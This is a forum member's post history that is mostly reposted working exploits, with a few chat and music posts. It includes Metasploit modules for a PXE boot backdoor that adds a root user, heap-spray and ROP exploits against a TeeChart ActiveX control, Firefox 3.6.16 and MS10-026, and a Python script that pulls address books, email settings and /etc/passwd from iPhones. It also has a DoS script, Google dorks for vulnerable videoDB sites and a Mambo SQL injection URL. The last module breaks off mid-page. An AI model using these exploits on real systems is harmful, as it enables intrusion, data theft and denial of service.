Jump to content

Gonzalez

Active Members
  • Posts

    1577
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. As vrea ca Snoop sa fie CEO.
  2. Wu Tang Clan - Take it back.mp3 -Gonzalez
  3. TECHNO & MINIMAL 07.02.2011 (HD) TECHNO & MINIMAL 07.02.2011 (HD) - YouTube
  4. dr_dre-the_wash_feat_snoop_dogg.mp3 -Gonzalez
  5. Research E TorrentLeech. Daca ai una in plus, zi-mi prin PM. Mersi -Gonzalez
  6. Incearca: https://www.cryptocloud.com/ Cryptocloud employs robust, opensource security technology to protect all of your internet applications from surveillance: web, email, IM, VoIP, p2p - every packet. Route around censorship and limitations like packet shaping, content filtering, traffic logging, and protocol limits - make your own 'net neutrality'. -Gonzalez
  7. nice share
  8. seo, seo, seo
  9. ## # $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::TFTPServer def initialize super( 'Name' => 'PXE exploit server', 'Version' => '$Revision: 13493 $', 'Description' => %q{ This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen. }, 'Author' => [ 'scriptjunkie' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 13493 $', 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 4500, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', { } ], ], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0 ) register_options( [ OptInt.new('SESSION', [ false, 'A session to pivot the attack through' ]) ], self.class) register_advanced_options( [ OptString.new('TFTPROOT', [ false, 'The TFTP root directory to serve files from' ]), OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]), OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]), OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]), OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ]) ], self.class) end def exploit if not datastore['TFTPROOT'] datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit') end datastore['FILENAME'] = "update1" datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them! # Prepare payload print_status("Creating initrd") initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom')) uncompressed = Rex::Text.ungzip(initrd) payl = payload.generate uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl initrd = Rex::Text.gzip(uncompressed) # Meterpreter attack if framework.sessions.include? datastore['SESSION'] client = framework.sessions[datastore['SESSION']] if not client.lanattacks print_status("Loading lanattacks extension...") client.core.use("lanattacks") end print_status("Loading DHCP options...") client.lanattacks.load_dhcp_options(datastore) 1.upto(4) do |i| print_status("Loading file #{i} of 4") if i < 4 contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) else contents = initrd end client.lanattacks.add_tftp_file("update#{i}",contents) end print_status("Starting TFTP server...") client.lanattacks.start_tftp print_status("Starting DHCP server...") client.lanattacks.start_dhcp print_status("pxesploit attack started") return end # normal attack print_status("Starting TFTP server...") @tftp = Rex::Proto::TFTP::Server.new @tftp.set_tftproot(datastore['TFTPROOT']) @tftp.register_file('update4',initrd) @tftp.start print_status("Starting DHCP server...") @dhcp = Rex::Proto::DHCP::Server.new( datastore ) @dhcp.start print_status("pxesploit attack started") # Wait for finish.. @tftp.thread.join @dhcp.thread.join print_status("pxesploit attack completed") end end
  10. #!/usr/bin/python #---------------------------------------------------------------- #Software : iPhone/iPad Phone Drive 1.1.1 #Type of vulnerability : Directory Traversal #Tested On : iPhone 4 (IOS 4.3.3/Jailbroken) #---------------------------------------------------------------- #Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8 #---------------------------------------------------------------- #Discovered by : Khashayar Fereidani #Team Website : Http://IRCRASH.COM #English Forums : Http://IRCRASH.COM/forums/ #Team Members : Khashayar Fereidani , Arash Allebrahim #Email : irancrash [ a t ] gmail [ d o t ] com #Facebook : http://facebook.com/fereidani #Twitter : http://twitter.com/ircrash #---------------------------------------------------------------- import urllib2 def urlread(url,file): url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file u = urllib2.urlopen(url) localFile = open('result.html', 'w') localFile.write(u.read()) localFile.close() print "file saved as result.html\nIRCRASH.COM 2011" print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT -\n- Discovered by : Khashayar Fereidani -\n- http://ircrash.com/ -\n----------------------------------------" url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):") f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"] print f[1] id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:")) if not('http:' in url): url='http://'+url if ((id>0) and (id<6)): file=f[id] urlread(url,file) if (id==6): file=raw_input("Enter Local File Address : ") urlread(url,file)
  11. #!/usr/bin/python # Exploit Title: Simple HTTPd 1.42 PoC DoS # Date: 8/10/2011 # Author: G13 # Software Link: http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download # Version: 1.42 # Tested on: WinXP SP1 # CVE : 2011-2900 # # Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit still works. # Simple HTTPd is still affected by the bug. The executable must be compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled # under MinGW. import socket, sys buf = "A" * 6000 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.1.101',80)) s.send("PUT /" + buf + "/ HTTP/1.0\r\n") s.send("\r\n") print s.recv(1024) s.close()
  12. DORK:allinurl:borrow.php?diskid= DORK:allintitle:videodb # Vendor: http://www.videodb.net/blog/ $ -----------# | S3C0VERUN | & ------------@ along with this i was able in some sites to determine that you can overwrite the databse contents and also if you look in the source you se there password the server name and the dbuser htis is a problem because most likely the site could be taken over due to the fact the admin doesnt usually change passwords on the same box vulnerable software is videodb this is an information disclosure vulnerability it appears most sites running this are vulnerable and have the same database structure im not sure if this is an old version or if it is completely vulnerable im downloading the new version now from source <?php /** * Borrow Manager * * Handles lending of disks * * @package videoDB * @author Andreas Gohr <a.gohr@web.de> * @version $Id: borrow.php,v 2.20 2008/05/12 13:01:12 andig2 Exp $ */ require_once './core/functions.php'; require_once './core/output.php'; // check for localnet localnet_or_die(); // permission check permission_or_die(PERM_WRITE, PERM_ANY); // borrowmanagement for single disk $editable = false; if (!empty($diskid)) { if (check_permission(PERM_WRITE, get_owner_id($diskid,true))) { $editable = true; if ($return) { $SQL = "DELETE FROM ".TBL_LENT." WHERE diskid = '".addslashes($diskid)."'"; runSQL($SQL); } if (!empty($who)) { $who = addslashes($who); $SQL = "INSERT INTO ".TBL_LENT." SET who = '".addslashes($who)."', diskid = '".addslashes($diskid)."'"; runSQL($SQL); } $SQL = "SELECT who, DATE_FORMAT(dt,'%d.%m.%Y') AS dt FROM ".TBL_LENT." WHERE diskid = '".addslashes($diskid)."'"; $result = runSQL($SQL); $who = $result[0]['who']; $dt = $result[0]['dt']; } } $WHERES = ''; if ($config['multiuser']) { // get owner from session- or use current user session_default('owner', get_username(get_current_user_id())); // build html select box $all = strtoupper($lang['radio_all']); $smarty->assign('owners', out_owners(array($all => $all), PERM_READ)); $smarty->assign('owner', $owner); // if we don't have read all permissions, limit visibility using cross-user permissions if (!check_permission(PERM_READ)) { $JOINS = ' LEFT JOIN '.TBL_PERMISSIONS.' ON '.TBL_DATA.'.owner_id = '.TBL_PERMISSIONS.'.to_uid'; $WHERES .= ' AND '.TBL_PERMISSIONS.'.from_uid = '.get_current_user_id().' AND '.TBL_PERMISSIONS.'.permissions & '.PERM_READ.' != 0'; } // further limit to single owner if ($owner != $all) $WHERES .= " AND ".TBL_USERS.".name = '".addslashes($owner)."'"; } // overview on lent disks $SQL = "SELECT who, DATE_FORMAT(dt,'%d.%m.%Y') as dt, ".TBL_LENT.".diskid, CASE WHEN subtitle = '' THEN title ELSE CONCAT(title,' - ',subtitle) END AS title, ".TBL_DATA.".id, COUNT(".TBL_LENT.".diskid) AS count, ".TBL_USERS.".name AS owner FROM ".TBL_LENT.", ".TBL_DATA." LEFT JOIN ".TBL_USERS." ON owner_id = ".TBL_USERS.".id $JOINS WHERE ".TBL_LENT.".diskid = ".TBL_DATA.".diskid $WHERES GROUP BY ".TBL_LENT.".diskid ORDER BY who, ".TBL_LENT.".diskid"; $result = runSQL($SQL); // check permissions for($i=0; $i < count($result); $i++) { $result[$i]['editable'] = check_permission(PERM_WRITE, get_userid($result[$i]['owner'])); } // prepare templates tpl_page(); $smarty->assign('diskid', $diskid); $smarty->assign('who', $who); $smarty->assign('dt', $dt); $smarty->assign('editable', $editable); $smarty->assign('borrowlist', $result); // display templates tpl_display('borrow.tpl'); ?> ADDSLASHES IS THE PROBLEM I ASSUME IT COULD BE MUCH WORSE IF HE MADE THIS MISTAKE I URGE YOU ALL TOO LOOK INTO THE CODE the problem here is the fact he is using addslashes that can be bypassed with a valid multi byte ending in 0x5c describd in chris Shiflett's article if i must say this could be either good or bad thing is it just throws an error the injection is possible on all of these nnow what are we to do this could be huge or small depending on if it is used widely or just small based but this is the new code from sourceforge i believe this to b the script that caused the issue most of the sites including the makers demo use borrow few others changed
  13. ========================================= Mambo CMS 4.6.x (4.6.5) | SQL Injection ========================================= 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites. 3. VULNERABILITY DESCRIPTION The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED Tested on Mambo CMS 4.6.5 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/mambo/administrator/index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=-1 OR (SELECT 9999 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (9999=9999) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent 6. SOLUTION The vendor seems to discontinue the development. It is recommended to use another CMS in active development. 7. VENDOR Mambo CMS Development Team Mambo Developer 8. CREDIT This vulnerability was discovered by Aung Khant, YGN Ethical Hacker Group :: Where Burmese Hackers were Born, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-11-31: notified vendor through bug tracker 2011-08-12: no patched version released up to date 2011-08-12: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip #yehg [2011-08-12]
  14. ## # $Id: teechart_pro.rb 13522 2011-08-11 11:17:30Z swtornio $ ## ### # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super( update_info(info, 'Name' => 'TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference', 'Description' => %q{ This module exploits a integer overflow in TeeChart Pro ActiveX control. When sending an overly large/negative integer value to the AddSeries() property of TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the value and is later directly trusted and called upon. This module has been designed to bypass DEP only under IE8. Multiple versions (including the latest version) are affected by this vulnerability that date back to as far as 2001. The following controls are vulnerable: TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4); TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD); TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E); TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196); TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258). The controls are deployed under several SCADA based systems including: Unitronics OPC server v1.3; BACnet Operator Workstation Version 1.0.76 }, 'License' => MSF_LICENSE, 'Author' => [ # twitter.com/net__ninja 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery/msf module ], 'Version' => '$Revision: 13522 $', 'References' => [ #[ 'CVE', '?' ], [ 'OSVDB', '74446'], [ 'URL', 'http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], # For exploitation we need to calculate a value for EDX: # <target address> - EAX / 4 = address to place in edx via signed integar # 0x0c0c0c0c - 0x023FB8F4 = 0x09CC5318 / 4 = 0x027314C6 = decimal: 41096390 [ 'Windows XP SP0-SP3 (IE6/IE7)', { 'Ret' => 0x027314C6 } ], # Windows XP target + IE8 + JAVA = ASLR/DEP Bypass # 0x09442020- 0x0326B8F4 = 61D672C/4 = 18759CB [ 'Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)', { 'Ret' => 0x014E59CB, # 0x09442020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x09441FF8 # get back to the 2nd of rop. 'Pivot' => 0x09441FF8 } ], # Windows 7 target + IE8 + JAVA = ASLR/DEP Bypass # 0x16672020 - 0x040AB8F4/4 = 0x049719CB [ 'Windows 7 + JAVA + DEP bypass (IE8)', { 'Ret' => 0x049719CB, # 0x16672020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x16671FF8 # get back to the 2nd of rop. 'Pivot' => 0x16671FF8 } ] ], 'DisclosureDate' => 'Aug 11 2011', 'DefaultTarget' => 0)) end def junk return rand_text_alpha(4).unpack("L")[0].to_i end def on_request_uri(cli, request) #Set target manually or automatically my_target = target if my_target.name == 'Automatic' agent = request.headers['User-Agent'] if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ my_target = targets[1] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/ my_target = targets[1] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ my_target = targets[2] elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/ my_target = targets[3] end end print_status("Target selected: #{my_target.name}") if datastore['VERBOSE'] # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) # align stack retn = Rex::Text.to_unescape([0x7C3410C4].pack('V*')) pop_pop_retn = Rex::Text.to_unescape([0x7C3410C2].pack('V*')) # shellcode sc = Rex::Text.to_unescape(p.encoded) # Randomize ALL the javascript variable names. rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) rand9 = rand_text_alpha(rand(100) + 1) rand10 = rand_text_alpha(rand(100) + 1) j_applet = rand_text_alpha(rand(100) + 1) if my_target.name =~ /IE6/ or my_target.name =~ /IE7/ js = <<-EOF var #{rand3} = unescape('#{sc}'); var #{rand4} = unescape('%u0c0c%u0c0c'); var #{rand5} = 20; var #{rand6} = #{rand5} + #{rand3}.length; while(#{rand4}.length < #{rand6}) { #{rand4} += #{rand4}; } var #{rand7} = #{rand4}.substring(0, #{rand6}); var #{rand8} = #{rand4}.substring(0, #{rand4}.length - #{rand6}); while((#{rand8}.length + #{rand6}) < 0x50000) { #{rand8} = #{rand8} + #{rand8} + #{rand7}; } #{rand10}=new Array(); for(#{rand9}=0; #{rand9}<200; #{rand9}++){ #{rand10}[#{rand9}] = #{rand8} + #{rand3}; } function #{rand2}() { #{rand1}.AddSeries(#{target.ret}); } EOF end #http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf if my_target.name =~ /IE8/ # thanks to corelanc0d3r & mona.py :^) for the universal aslr/dep bypass (msvcr71.dll) # https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ rop_gadgets = [ my_target['Pivot'],# Pivot back EAX for ESP control 0x7C342643, # XCHG EAX,ESP; POP EDI; ; ADD BYTE PTR DS:[EAX],AL; POP ECX; RETN 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # Make EAX readable 0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) 0x41414141, # EBP (filler) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # <- *&VirtualProtect() 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) 0x7c346c0b, # Slide, so next gadget would write to correct stack location 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) 0x41414141, # EDI (filler) 0x41414141, # will be patched at runtime (VP), then picked up into ESI 0x41414141, # EBX (filler) 0x7c376402, # POP EBP # RETN (msvcr71.dll) 0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0xfffffdff, # size 0x00000201 -> ebx, modify if needed 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll) 0x7c354901, # POP EBX # RETN (MSVCR71.dll) 0xffffffff, # pop value into ebx 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll) 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) 0x7c34d201, # POP ECX # RETN (MSVCR71.dll) 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll) 0x7c34b8d8, # ROP NOP (-> edi) 0x7c344f87, # POP EDX # RETN (MSVCR71.dll) 0xffffffc0, # value to negate, target value : 0x00000040, target: edx 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x90909090, # NOPS (-> eax) 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) ].pack('V*') rop = Rex::Text.to_unescape(rop_gadgets) custom_js = <<-EOF function #{rand3}(){ #{rand5} = new heapLib.ie(0x20000); var #{rand6} = unescape('#{rop}'); #{rand6} += unescape('#{sc}'); while(#{rand6}.length <= 0xffc) #{rand6} += unescape('#{retn}') while(#{rand6}.length < 0x1000) #{rand6} += unescape('#{pop_pop_retn}') var #{rand7} = #{rand6}; while(#{rand7}.length < 0x40000) #{rand7} += #{rand7}; #{rand8} = #{rand7}.substring(2, 0x40000 - 0x21); for(var i = 0; i < 0x400; i++) { #{rand5}.alloc(#{rand8}); } } function #{rand2}(){ #{rand3}(); #{rand1}.AddSeries(#{my_target.ret}); } EOF js = heaplib(custom_js) end content = <<-EOF <object classid='clsid:FCB4B50A-E3F1-4174-BD18-54C3B3287258' id='#{rand1}' ></object> <script language='JavaScript' defer> #{js} </script> <body onload="JavaScript: return #{rand2}();"> <body> </html> EOF print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") #Remove the extra tabs from content content = content.gsub(/^\t\t/, '') # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end
  15. ## # $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "3.6.16", :ua_maxver => "3.6.16", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability', 'Description' => %q{ This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3 }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # discovery 'Rh0' # metasploit module ], 'Version' => "$Revision: 13507 $", 'References' => [ ['CVE', '2011-0065'], ['OSVDB', '72085'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'], ['URL', 'http://www.mozilla.org/security/announce/2010/mfsa2011-13.html'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, }, 'Targets' => [ [ 'Firefox 3.6.16 on Windows XP SP3', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 10 2011' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli).encoded) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) # DEP bypass using xul.dll custom_stack = [ 0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8 0x7c801ad4, # VirtualProtect 0xbeeff00d, 0xbeeff00d, 0x1003876B, # jmp esp 0x0c0c0048, # start address 0x00000400, # size 1024 0x00000040, # Page EXECUTE_READ_WRITE 0x0c0c0c00 # old protection ].pack("V*") payload_buf = '' payload_buf << custom_stack payload_buf << payload escaped_payload = Rex::Text.to_unescape(payload_buf) #Random JavaScript variable names js_element_name = rand_text_alpha(rand(10) + 5) js_obj_addr_name = rand_text_alpha(rand(10) + 5) js_sc_name = rand_text_alpha(rand(10) + 5) js_ret_addr_name = rand_text_alpha(rand(10) + 5) js_chunk_name = rand_text_alpha(rand(10) + 5) js_final_chunk_name = rand_text_alpha(rand(10) + 5) js_block_name = rand_text_alpha(rand(10) + 5) #Reference: adobe_flashplayer_newfunction.rb custom_js = <<-JS #{js_element_name} = document.getElementById("d"); #{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0); #{js_obj_addr_name} = unescape("\\x0c%u0c0c"); var #{js_sc_name} = unescape("#{escaped_payload}"); var #{js_ret_addr_name} = unescape("%u0024%u0c0c"); while(#{js_ret_addr_name}.length+20+8 < 0x100000) {#{js_ret_addr_name} += #{js_ret_addr_name};} var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,(0x48-0x24)/2); #{js_chunk_name} += #{js_sc_name}; #{js_chunk_name} += #{js_ret_addr_name}; var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2); while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};} var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - (0x1020-0x08)/2); array = new Array() for (n=0;n<0x1f0;n++){ array[n] = #{js_block_name} + #{js_sc_name}; } #{js_element_name}.data = ""; JS #Remove the extra tabs custom_js = custom_js.gsub(/^\t\t/, '') html = <<-HTML <html> <body> <object id="d"><object> <script type="text/javascript"> #{custom_js} </script> </body> </html> HTML return html end end
  16. ## # $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow', 'Description' => %q{ This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0's so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control. }, 'Author' => [ 'Yamata Li', # Vulnerability Discovery 'Shahin Ramezany <shahin[at]abysssec.com', # Vulnerability Analysis and Exploit 'juan vazquez', # Metasploit module 'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 13555 $', 'References' => [ ['CVE', '2010-0480'], ['OSVDB', '63749'], ['BID', '39303'], ['MSB', 'MS10-026'], ['URL', 'http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'], ['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/'] ], 'Payload' => { 'Space' => 4000 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Targets' => [ # Target 0: Automatic # Tested with: # Windows XP SP3 English IE 6 # Windows XP SP3 English IE 7 # Windows XP SP3 English IE 8: The exploiting site must be a trusted # site to load the .NET control # .NET CLR required [ 'Windows XP SP3 Automatic', { 'Platform' => 'win', 'Ret' => 0x72000000 }, ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 13 2010')) end def exploit # Embed our payload in a .Net binary ibase = target.ret - 0x10000 shellcode = rand_text_alpha(target.ret - ibase - 0x2285) shellcode << payload.encoded #Use our own custom .Net binary, because we require a much bigger file #to land our payload at the right place opts = { :template => 'template_dotnetmem.dll', :text_offset => 0x1285, :text_max => 0x20000, :pack => 'a131072', :uuid_offset => 135816 } @dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts) # Load our AVI file path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0480.avi") f = File.open(path, "rb") @trigger = f.read(f.stat.size) f.close super end def on_request_uri(cli, request) agent = request['User-Agent'] case request['User-Agent'] when /MSIE.*Windows NT 5\.1.*\.NET CLR .*/ when /Windows-Media-Player/ # AVI is requested by WMP else send_not_found(cli) print_error("#{cli.peerhost}:#{cli.peerport} - target not supported: #{agent}") return end if (request.uri =~ /\.html/i) avi_name = rand_text_alpha(4) avi_trigger = "" if ("/" == get_resource[-1,1]) avi_trigger = get_resource[0, get_resource.length - 1] else avi_trigger = get_resource end avi_trigger << "/#{avi_name}.avi" html = %Q|<html> <body> <OBJECT ID="MediaPlayer" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab# Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..." TYPE="application/x-oleobject" width="280" height="46"> <param name="fileName" value="#{avi_trigger}"> <param name="animationatStart" value="true"> <param name="transparentatStart" value="true"> <param name="autoStart" value="true"> <param name="showControls" value="true"> <param name="Volume" value="-300"> <embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="#{avi_trigger}" name="MediaPlayer" width=280 height=46 autostart=1 showcontrols=1 volume=-300> </embed> </OBJECT> </body> </html> | html = html.gsub(/^\t\t\t/, '') print_status("Sending trigger loader to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) elsif (request.uri =~ /\.avi$/i) print_status "Sending AVI trigger to #{cli.peerhost}:#{cli.peerport} ..." send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' }) return elsif (request.uri =~ /\.dll$/i) print_status "Sending DLL file to #{cli.peerhost}:#{cli.peerport} ..." send_response( cli, @dotnet_payload, { 'Content-Type' => 'application/x-msdownload', 'Connection' => 'close', 'Pragma' => 'no-cache' } ) return end html_name = rand_text_alpha(4) dll_uri = "" html_trigger = "" if ("/" == get_resource[-1,1]) dll_uri = get_resource[0, get_resource.length - 1] html_trigger = get_resource[0, get_resource.length - 1] else dll_uri = get_resource html_trigger = get_resource end dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll" js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>" html_trigger << "/#{html_name}.html" html = %Q|<html> <head> <script language="javascript"> function forward() { window.location = window.location + '#{html_trigger}'; } function start() { setTimeout("forward()", 2000); } </script> </head> <body onload="start()"> <object 